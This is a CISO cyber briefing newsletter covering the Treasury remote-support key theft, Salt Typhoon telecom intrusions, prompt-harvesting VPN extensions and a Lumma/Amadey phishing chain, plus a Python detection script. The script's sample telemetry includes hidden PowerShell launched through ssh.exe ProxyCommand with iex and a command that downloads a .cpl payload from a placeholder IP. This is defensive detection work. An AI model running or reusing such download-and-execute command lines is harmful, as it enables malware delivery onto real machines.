Daily Signal Note: Stolen Keys | Unpatched Perimeters
CybersecurityHQ | CISO Cyber Briefing Note

Welcome reader, here’s today’s Cyber Briefing Note.
Brought to you by:
Smallstep – Secures Wi-Fi, VPNs, ZTNA, SaaS and APIs with hardware-bound credentials powered by ACME Device Attestation
LockThreat – AI-powered GRC that replaces legacy tools and unifies compliance, risk, audit and vendor management in one platform
CybersecurityHQ provides analyst-grade cyber intelligence used by CISOs and security leaders inside the Fortune 100. Each briefing identifies structural security failures and decision breakdowns across identity, machine trust, third-party access, and enterprise attack surfaces. This work exists to inform executive judgment, not to react to headlines.
—
Subscriber access includes weekly CISO briefings, deep-dive intelligence reports, premium research, and supporting tools. Corporate plans available.
SIGNAL 1: Treasury Breach via Third-Party Remote Support Key
Chinese state-sponsored actors accessed U.S. Treasury Department workstations through BeyondTrust's Remote Support SaaS platform. The threat actor obtained a key that the vendor used to secure the cloud-based service through which it provides remote technical support to Treasury Departmental Offices (DO) end users. With that key, the actor was able to bypass the service's security controls, remotely access certain Treasury DO user workstations, and read certain unclassified documents held by those users. BeyondTrust revoked the stolen API key and shut down all compromised instances of the tool. The structural point is a vendor-held machine credential that could override the customer's own access controls: the customer never held, scoped, or rotated the key that ultimately granted access to its workstations.
SIGNAL 2: Salt Typhoon Scope Expands to Nine U.S. Telecoms
The White House said Friday that nine telecom companies were impacted by the Chinese espionage effort. In one incident response case, attackers obtained credentials for a single administrator account with access to more than 100,000 routers. Some of the vulnerabilities exploited by Salt Typhoon date back to 2018; patches were issued, but the affected carriers never applied them. The White House has outlined four areas where telecom companies can improve their cybersecurity: configuration management, vulnerability management, network segmentation, and sector-wide information sharing.
SIGNAL 3: Browser Extensions Observed Collecting AI Chatbot Inputs
Urban VPN Proxy, a Google Chrome and Microsoft Edge extension with more than 7.3 million installations, was observed stealthily gathering prompts entered by users into AI-powered chatbots like OpenAI ChatGPT, Anthropic Claude, Microsoft Copilot, DeepSeek, Google Gemini, xAI Grok, Meta AI, and Perplexity. Three other extensions from the same developer, 1ClickVPN Proxy, Urban Browser Guard, and Urban Ad Blocker, were also updated with similar functionality. Collectively, these add-ons were installed more than eight million times.
SIGNAL 4: Lumma/Amadey Campaign Targeting Industrial Sector
A new attack aimed at industrial market players uses Lumma Stealer and Amadey Bot: the former steals data, the latter hands the operator control of the infected system. The chain begins with phishing emails carrying URLs that lead users to download LNK files disguised as PDFs. Once opened, the malicious LNK launches PowerShell through an ssh.exe command. A chain of scripts then downloads a CPL file, and PowerShell and Windows Management Instrumentation (WMI) commands are used to collect detailed information about the victim's system. On most endpoints ssh.exe spawning a script interpreter is uncommon, which makes the ssh.exe-to-PowerShell hop the practical detection point in this chain.
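As an added example, not code from the briefing or from the vendor report it summarizes, the detection below walks constructed Sysmon-style process and file events for the observable steps of this chain (document-disguised LNK, ssh.exe launching PowerShell, PowerShell fetching a .cpl, WMI recon) and correlates the WMI step back to an ssh.exe ancestor so that ordinary administrator use of Get-CimInstance does not fire. The JSON-lines schema, the hosts, PIDs, paths and the 198.51.100.7 address are all assumptions; the ProxyCommand launch in the sample is one plausible ssh.exe-to-PowerShell mechanism and is not stated by the briefing.

```python
"""Process-chain detection for the LNK -> ssh.exe -> PowerShell -> CPL -> WMI
recon sequence. Added example, not the briefing's or the vendor's code.

The schema (event, host, pid, ppid, image, parent_image, cmdline, target) is
assumed; map the field names onto your own Sysmon or EDR export.
"""
import json

POWERSHELL = {"powershell.exe", "pwsh.exe"}
WMI_KEYWORDS = ("get-wmiobject", "get-ciminstance", "wmic")
DOWNLOAD_KEYWORDS = ("invoke-webrequest", "downloadfile", "downloadstring", "http")
# Assumption: the briefing mentions PDFs only; the other extensions are common decoys.
DECOY_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx")

# Constructed telemetry: hosts, PIDs, paths and the IP are invented.
# ws-017 carries the malicious chain; ws-022 is benign admin activity.
# The ssh.exe ProxyCommand option runs an arbitrary command and is assumed here
# as the launch mechanism; the briefing does not say how ssh.exe was used.
SAMPLE_LOG = r"""
{"event":"file_create","host":"ws-017","pid":3320,"image":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","target":"C:\\Users\\jdoe\\Downloads\\Invoice_Q4.pdf.lnk"}
{"event":"process_create","host":"ws-017","pid":4120,"ppid":1200,"image":"C:\\Windows\\System32\\OpenSSH\\ssh.exe","parent_image":"C:\\Windows\\explorer.exe","cmdline":"ssh.exe -o ProxyCommand=\"powershell -w hidden -ep bypass -c iex(...)\" localhost"}
{"event":"process_create","host":"ws-017","pid":4133,"ppid":4120,"image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parent_image":"C:\\Windows\\System32\\OpenSSH\\ssh.exe","cmdline":"powershell -w hidden -ep bypass -c iex(...)"}
{"event":"process_create","host":"ws-017","pid":4150,"ppid":4133,"image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parent_image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell -c \"Invoke-WebRequest http://198.51.100.7/u/s.cpl -OutFile $env:TEMP\\s.cpl\""}
{"event":"process_create","host":"ws-017","pid":4168,"ppid":4133,"image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parent_image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell -c \"Get-CimInstance Win32_ComputerSystem; Get-CimInstance Win32_Process\""}
{"event":"process_create","host":"ws-022","pid":5011,"ppid":4000,"image":"C:\\Windows\\System32\\OpenSSH\\ssh.exe","parent_image":"C:\\Windows\\System32\\WindowsTerminal.exe","cmdline":"ssh.exe admin@build-host"}
{"event":"process_create","host":"ws-022","pid":5020,"ppid":4000,"image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parent_image":"C:\\Windows\\System32\\WindowsTerminal.exe","cmdline":"powershell -c Get-CimInstance Win32_OperatingSystem"}
"""


def load(log_text):
    """Parse JSON lines, skipping blank lines."""
    return [json.loads(line) for line in log_text.splitlines() if line.strip()]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def ancestor_images(event, by_key):
    """Image names of the process ancestors recorded on the same host, nearest first."""
    chain, cur, seen = [], event, set()
    while True:
        key = (cur["host"], cur.get("ppid"))
        if key not in by_key or key in seen:
            return chain
        seen.add(key)
        cur = by_key[key]
        chain.append(basename(cur["image"]))


def detect(events):
    """Return (rule, host, pid) findings for the chain's observable steps."""
    by_key = {(e["host"], e["pid"]): e for e in events if e["event"] == "process_create"}
    findings = []
    for e in events:
        host, pid = e["host"], e["pid"]
        if e["event"] == "file_create":
            name = basename(e["target"])
            # Step 1: an .lnk wearing a document extension in front of it.
            if name.endswith(".lnk") and name[:-4].endswith(DECOY_EXTENSIONS):
                findings.append(("lnk_masquerading_as_document", host, pid))
            continue
        if e["event"] != "process_create":
            continue
        image, parent = basename(e["image"]), basename(e["parent_image"])
        cmd = e["cmdline"].lower()
        # Step 2: ssh.exe as the PowerShell launcher, visible from either side of the spawn.
        if image == "ssh.exe" and "powershell" in cmd:
            findings.append(("ssh_cmdline_invokes_powershell", host, pid))
        if image in POWERSHELL and parent == "ssh.exe":
            findings.append(("ssh_spawned_powershell", host, pid))
        # Step 3: PowerShell fetching a Control Panel item (.cpl) from the network.
        if image in POWERSHELL and ".cpl" in cmd and any(k in cmd for k in DOWNLOAD_KEYWORDS):
            findings.append(("powershell_downloads_cpl", host, pid))
        # Step 4: WMI recon, but only inside an ssh.exe-rooted process tree; a plain
        # Get-CimInstance from an admin's terminal is normal and must not fire.
        if (image in POWERSHELL and any(k in cmd for k in WMI_KEYWORDS)
                and "ssh.exe" in ancestor_images(e, by_key)):
            findings.append(("wmi_recon_under_ssh_chain", host, pid))
    return findings


if __name__ == "__main__":
    for rule, host, pid in detect(load(SAMPLE_LOG)):
        print(f"{host} pid={pid} {rule}")
```

On the sample data every step on ws-017 fires once and nothing on ws-022 does, which is the property to preserve when porting the rules: the ssh.exe parentage and the process-tree correlation carry the signal, while the WMI and download keywords on their own are far too common to alert on.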
Author
Daniel Michan is the founder of CybersecurityHQ, a CISO-grade intelligence platform read weekly across the Fortune 100. He analyzes identity-centric risk, machine identity failures, SaaS integration breakdowns, and emerging AI-speed threats, producing executive briefings and deep-dive research used by enterprise security leaders for decision support.